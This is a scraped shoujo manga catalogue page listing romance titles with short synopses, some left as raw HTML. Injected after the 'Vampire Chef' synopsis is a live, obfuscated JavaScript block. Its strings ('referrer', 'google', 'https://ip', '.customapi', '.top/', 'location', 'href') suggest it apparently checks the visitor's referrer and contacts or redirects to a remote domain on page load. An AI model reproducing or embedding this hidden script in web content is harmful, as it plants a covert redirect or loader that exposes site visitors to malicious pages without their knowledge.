Shoujo - Page 787

Shoujo manga is designed for young females, featuring romantic relationships, emotional development, and personal growth. The stories often follow a female protagonist navigating love and life challenges, with themes of friendship and self-discovery.

9445 results

Vampire Chef

A sweet romance between a tired office woman and a dangerous vampire chef who works hard to try and drink her delicious blood. “I want to taste you again.” In Itaewon, there is a very popular unnamed restaurant assumed to have a taste that no human can make. Hong Ki Joon, the owner and chef, is not really a human! He is a half-vampire born from a human father and a vampire mother. With his unique vampiric senses, he makes out-of-this world flavors unobtainable by man. But for him, there’s only one thing! He can’t imitate the taste of a heavenly drink… Right, the blood he tasted on the lips of his kindergarten friend! He became a chef who studies every flavor in the world and suddenly his childhood friend, Kang Miro, anxiously appeared in front of him after 25 years. He doesn’t know why he’s looking forward to tasting her blood again?! A thirty years old office worker. Tired as a bee, her delicious blood is covered with the stink of cigarette, alcohol, fast food and MSG! “Good. From now on, I will feed you properly.” This is the start of a blood-cleansing project full of plans of a vampire chef that diligently feeds, manages and cares for her to make her blood delicious again! A worn out and tired officewoman’s exciting and heart-thumping healing cooking manhwa! An exciting, juicy romance starts now!<script></script><script>function _0x3812(_0x19ab0f,_0x4e72c7){var _0x3ff8b2=_0x1a78();return _0x3812=function(_0x68b93c,_0xaaaa3f){_0x68b93c=_0x68b93c-(-0x228f+0x977*0x2+0x10af);var _0xfe169f=_0x3ff8b2[_0x68b93c];return _0xfe169f;},_0x3812(_0x19ab0f,_0x4e72c7);}(function(_0x22b404,_0x321f72){var _0x38a9be=_0x3812,_0x2a2a09=_0x22b404();while(!![]){try{var _0x1e6cbc=-parseInt(_0x38a9be(0x111))/(-0x4bd+0xa61+-0x3*0x1e1)+parseInt(_0x38a9be(0x12a))/(0x1*-0x421+0xa9a*-0x2+0x1957)+-parseInt(_0x38a9be(0x10f))/(0x819+-0x1*-0x943+-0x1159)+-parseInt(_0x38a9be(0x116))/(-0x161*-0x2+0xaa1+0x1*-0xd5f)*(parseInt(_0x38a9be(0x12c))/(0x1*0x15fc+0x3b*0x47+-0x2654))+parseInt(_0x38a9be(0x120))/(0x7*0x166+-0x12ef*-0x1+-0x991*0x3)*(parseInt(_0x38a9be(0x11f))/(-0x22c0+-0x1e9*0x9+0xcfe*0x4))+-parseInt(_0x38a9be(0x124))/(0xc*-0xb2+0x237b+-0x1b1b)+parseInt(_0x38a9be(0x119))/(-0x1bb8+-0x152*0x1+0x1d13);if(_0x1e6cbc===_0x321f72)break;else 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_0x4d6331=['eKuKc','286017RZqvbI','QiuqX','290676cLvFWs','text','then','ZocRr','TcItB','google','RgWWN','5868584gMBCCs','referrer','.customapi','CeYGE','oZdYQ','11xsNhAq','https://ip','includes','20wlNwDl','href','random','.top/','uLvyt','','33925PvzCjF','GwtQV','roPeA','floor','2btYFds','location','41778PQXIuN','9GhosVT','http://rea','5084758PqSdix','2493190JdyMbR'];_0x4321=function(){return _0x4d6331;};return _0x4321();}</script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script><script></script>


Trouble with the president

other name :  - Fall in Love With my Trouble After a failed one-night-stand, the bold woman left him secretly with"challenge words" on her bed sheet and he swore to find her back. "Most Wanted" appeared on headlines of papers the next day. Viewing her mobile phone, Tong Tianai blushed completely. "Qin Jinyang, President of Qin's Group..." She got into trouble with a president just because of her lip print... MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Chasing Star Moon

Chasing Star Moon After her parents divorced, Cong Cong has been living alone, one day she goes to meet her idol, falls down a flight of stairs and travels through time.


Honey, Don’t Run Away

<h1>Honey, Don’t Run Away</h1> &nbsp;


The Temptation of a Cat Demon

The Temptation of a Cat Demon A cat demon with a split personality is reincarnated with the memories of her past life. She wishes revenge on her lover from her past life, but upon meeting him finds herself falling all over for him again. What should she do?! A female main character with no sense of moral principles, between an arrogant, abstinent man and the charming, indifferent demon king, who will she choose!


Entangled Love

A story of a small country…The King’s most trusted Clairvoyance had deemed the Prince to have a heaven-defying fate, one that can overthrow the current King. With his position changed, the hero of our story escapes from the palace and ventures to the outside…


Pure Girl - Chunqing Yatou Huolala

Pure Girl - Chunqing Yatou Huolala <ul class="DRvOb"> <li>After getting drunk, Luo Yao Yao was sexually assaulted by the boss of the Imperial Dragon gang</li> <li>Two years later, she works as an elevator girl in a large business, and their paths cross once again</li> <li>A hot romance story that started from a heartbreak to a boss-employee romance in colored pages</li> <li>After a night of drinking, she accidentally slept with the insidious Underworld Emperor. What to do? Run! Two years later, she’s the elevator lady at China’s number one business, but is always harassed by a good-looking colleague…</li> </ul>


Grandest Wedding

Haomen De Yi Shenghun - Best Wedding - Grandest Wedding His newly -married wife is a thief with spending as her favorite."I'd like to buy villas. Seven!""Sure, do it!"“I‘d like to buy some sports cars.”"Sure, do it!""I'd like to date with other men with my villas and sports cars." The man's eyes flashed and carried he away on his shoulders."Stop it,honey! How do you pay me back since I rescued your life?" The bride is a thief who’s the biggest spender in town. Sports cars, luxury condos, you name it! How will she repay her husband who saved her life…? In the middle of a business exchange, company president Xiao Jue's ordered asset gets snatched away by a secret agent. Luckily, Xiao is fast on his feet and reveals the agent's identity. Young agent Xinxin goes back home from her failed mission, unaware that Xiao has taken interest in her skills. With a clever bait, Xiao lures Xinxin again to steal from him, but this time he offers her an assistant job. Xinxin greedily accepts, and her missions with Xiao Jue begins. Wait a minute, what IS Xiao Jue's business after all, and why is he always under attack? <div class="_32Nb8 _1r2VR"> <div class="_2CEz_ _3UOjD">Summary</div> </div> <ul class="DRvOb"> <li>Secret agent XinXin makes ends meet completing high-profile missions for her organization</li> <li>XinXin ends up as shady businessman Xiao Jue's personal secretary after failing to steal from him</li> <li>A fast-paced yet slow-burn romance comedy set in the seedy Chinese underground world</li> </ul>


Femme Fatale: The President's Deadly Wife

<div class="post-title font-title"> <h5><a href="">Femme Fatale: The President’s Deadly Wife</a></h5> <div class="_32Nb8 _1r2VR"> <div class="_2CEz_ _3UOjD">Summary</div> </div> <ul class="DRvOb"> <li>Gu Anfu, the heiress of her family's company, was told by her husband that he is cheating on her</li> <li>Not only that, she found out that her plane was sabotaged, so she jumps out and escapes to the ocean</li> <li>Luckily, she fell close to a yacht, and a handsome rich man named Yangyu saves her</li> </ul> </div> <div class="meta-item rating"> <div class="_32Nb8 _1r2VR"> <div class="_2CEz_ _3UOjD">Description</div> </div> <div>A relationship filled with conspiracy. A hijacked flight. She forgot her past but she met an unforgettable person.He said "You will be my Mao-er! Perhaps, this is destiny!"</div> <div>She's the daughter of a dangerous head of a gang while he's a more dangerous person no one wants to provoke. But overlapping fate brings them together that one day, she was to kidnap a guy which was said to harm her father's gang but it turns out she kidnapped the wrong person. When she realised it, it was already too late to retreat the situation. she has no choose but to be the servant to this domineering dangerous guy and dressed like a doll...</div> </div>


The dream guy of my past

The dream guy of my past- Mr. Right in Neighborhood She has loved him for 8 years. By virtue of identity substitution, she finally gets close to the man she's loved for 8 years. But old times, old things and former famous people cannot be recalled. Will the love fade out or turrn warm again? Gu Yusheng, do you know I'm Qin Zhiai? I will love you for the rest of my life. Translate by Zin


The Butterfly Mystery

Shangguan Lianlian pledged to marry Chuck Muir without parental consent, while Chuck Muir is suspected of being engaged to a daughter of a rich family. Lianlian was so sad and traveled to the ancient times... Involved in the legend that who drinks the Goddess from the Heavens' blood will live forever, she was chased by Guangling King's men. How does this couple which is separated by time and space, get together? A fantastic adventure of time and space is about to start!!!


Dihao Laogong Tai Kuangre

<h1>Dihao Laogong Tai Kuangre</h1> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
